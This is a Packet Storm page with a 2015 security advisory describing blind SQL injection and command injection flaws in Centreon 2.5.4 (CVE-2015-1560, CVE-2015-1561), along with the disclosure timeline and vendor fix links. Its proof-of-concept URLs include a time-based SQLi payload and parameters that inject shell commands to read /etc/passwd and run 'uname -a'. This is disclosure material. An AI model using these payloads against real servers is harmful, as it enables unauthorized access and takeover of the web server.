what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Merethis Centreon 2.5.4 SQL Injection / Remote Command Execution

Merethis Centreon 2.5.4 SQL Injection / Remote Command Execution
Posted Jul 8, 2015
Authored by DAU Huy Ngoc

Merethis Centreon versions 2.5.4 and below suffer from remote SQL injection and command execution vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2015-1560, CVE-2015-1561
SHA-256 | 33a4b6850bc8efa423b2d9f3dee79ec98c4aad0c75b497867a6a543467abc2bd

Merethis Centreon 2.5.4 SQL Injection / Remote Command Execution

Change Mirror Download
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution

CVEs: CVE-2015-1560, CVE-2015-1561

Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior

Product description:
Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)

Advisory introduction:
Centron 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.

Credit: Huy-Ngoc DAU of Deloitte Conseil, France

================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================
Vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which unsanitized "sid" GET parameter is used in a SQL request.

PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27

By exploiting CVE-2015-1560, an attacker can obtain among others a valid session_id, which is required to exploit CVE-2015-1561.

================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================
$command_line variable, which is passed to popen function, is constructed using unsanitized GET parameters.

PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting command into "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=today&session_id=[valid session_id]
- Injecting "uname –a" into "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%23&session_id=[valid session_id]

Combining two vulnerabilities, an unauthenticated attacker can take control of the web server.

================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi
13/02/2015 - Vendor fixed RCE

References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582


About Deloitte:
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close